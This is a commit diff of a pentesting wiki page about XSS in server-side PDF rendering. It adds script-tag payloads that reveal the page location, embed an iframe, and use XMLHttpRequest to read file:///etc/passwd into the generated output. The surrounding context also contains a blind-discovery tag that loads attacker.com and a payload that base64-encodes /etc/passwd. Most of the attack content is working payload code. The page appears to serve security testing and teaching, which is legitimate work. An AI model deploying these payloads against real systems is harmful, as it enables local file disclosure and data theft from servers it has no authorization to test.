GitBook: [master] one page modified
This commit is contained in:
parent
f822e925d0
commit
52c3234894
@ -13,8 +13,10 @@ Also, note that in a regular exploitation you will be **able to see/download the
|
|||||||
### Discovery
|
### Discovery
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
<!-- Basic discovery, Write "test"-->
|
<!-- Basic discovery, Write somthing-->
|
||||||
<img src="x" onerror="document.write('test')" />
|
<img src="x" onerror="document.write('test')" />
|
||||||
|
<script>document.write(JSON.stringify(window.location))</script>
|
||||||
|
<script>document.write('<iframe src="'+window.location.href+'"></iframe>')</script>
|
||||||
|
|
||||||
<!--Basic blind discovery, load a resource-->
|
<!--Basic blind discovery, load a resource-->
|
||||||
<img src="http://attacker.com"/>
|
<img src="http://attacker.com"/>
|
||||||
@ -65,7 +67,17 @@ The best conformable way to exploit this vulnerability is to abuse the vulnerabi
|
|||||||
x=new XMLHttpRequest;
|
x=new XMLHttpRequest;
|
||||||
x.onload=function(){document.write(btoa(this.responseText))};
|
x.onload=function(){document.write(btoa(this.responseText))};
|
||||||
x.open("GET","file:///etc/passwd");x.send();
|
x.open("GET","file:///etc/passwd");x.send();
|
||||||
</script>
|
</script>
|
||||||
|
```
|
||||||
|
|
||||||
|
```markup
|
||||||
|
<script>
|
||||||
|
xhzeem = new XMLHttpRequest();
|
||||||
|
xhzeem.open("GET","file:///etc/passwd");
|
||||||
|
xhzeem.send();
|
||||||
|
xhzeem.onload = function(){document.write(this.responseText);}
|
||||||
|
xhzeem.onerror = function(){document.write('failed!')}
|
||||||
|
</script>
|
||||||
```
|
```
|
||||||
|
|
||||||
```markup
|
```markup
|
||||||
|
Loading…
Reference in New Issue
Block a user